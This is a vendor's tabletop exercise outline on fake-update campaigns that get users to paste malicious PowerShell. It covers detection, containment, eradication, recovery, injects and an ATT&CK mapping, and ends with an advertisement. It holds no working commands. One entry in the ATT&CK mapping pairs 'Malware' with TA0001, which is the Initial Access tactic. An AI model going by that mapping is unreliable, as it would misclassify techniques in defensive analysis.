Introduction
Threat actors are using fake browser updates and software fixes to trick users into cutting, copying, and pasting PowerShell scripts loaded with various malware strains, including remote access Trojans (RATs) and infostealers, to infect their computers.
This tabletop exercise is relevant for organizations that use:
- Web browsers and productivity software vulnerable to social engineering attacks
- PowerShell scripting for system administration tasks
- Endpoint security tools to detect and prevent malware infections
Is your role listed? If so you might want to pay closer attention!
- IT administrators responsible for managing endpoints and scripting tools
- Security analysts who monitor for and investigate potential compromises
- Incident responders tasked with containing and eradicating malware
Simulation Start Points
Compelling starting points for this tabletop exercise could include:
- An employee reports receiving a suspicious error message prompting them to copy/paste a PowerShell command to fix their browser or Word application
- Endpoint detection tools alert on a spike in PowerShell executions across multiple laptops and desktops
- The security team identifies command-and-control traffic to known malware distribution domains
- Help desk tickets about slow computer performance and unauthorized browser extensions flood in
Tabletop Simulation Phases
The exercise should step through these key incident response phases:
Detection and Analysis
- Triage user reports and correlate with endpoint telemetry to identify the scope of the attack
- Analyze malware payloads and infrastructure to determine attacker TTPs
Containment
- Isolate infected endpoints to prevent malware propagation
- Block malicious domains and restrict PowerShell execution policies
Eradication
- Remove malware persistence mechanisms and artifacts from compromised systems
- Close the social engineering vectors that enabled initial access
Recovery
- Restore endpoints and user productivity with clean images and patched software
- Monitor for signs of re-infection or lateral movement
Post-Incident Activity
- Conduct a root cause analysis and document lessons learned
- Implement security control improvements, such as attack surface reduction rules and user awareness training
Inject Ideas
Spice up your exercise with challenging injects like:
- The attacker exfiltrates sensitive customer data and threatens to leak it unless a ransom is paid
- IT discovers that the malware exploited an unpatched zero-day vulnerability
- Malicious PowerShell payloads are found in legitimate repositories and software update mechanisms
- The incident handler laptop gets infected while triaging compromised systems
MITRE ATT&CK Techniques
Map this scenario to the ATT&CK framework for threat-informed defense:
- User Execution (T1204) - Attackers relied on users copying and pasting malicious code
- Obfuscated Files or Information (T1027) - PowerShell scripts were likely encoded to evade detection
- Malware (TA0001) - RATs and infostealers were deployed on objectives
- Command and Control (TA0011) - Malware communicated with attacker-controlled infrastructure
About ChaosTrack
Streamline your tabletop simulation experience with ChaosTrack - run exercises in 85% less time and for 90% less money. Regular practice through tabletop exercises is crucial for improving your organization's resilience against emerging threats like the cut-and-paste malware campaign covered in this article. Learn more at chaostrack.com.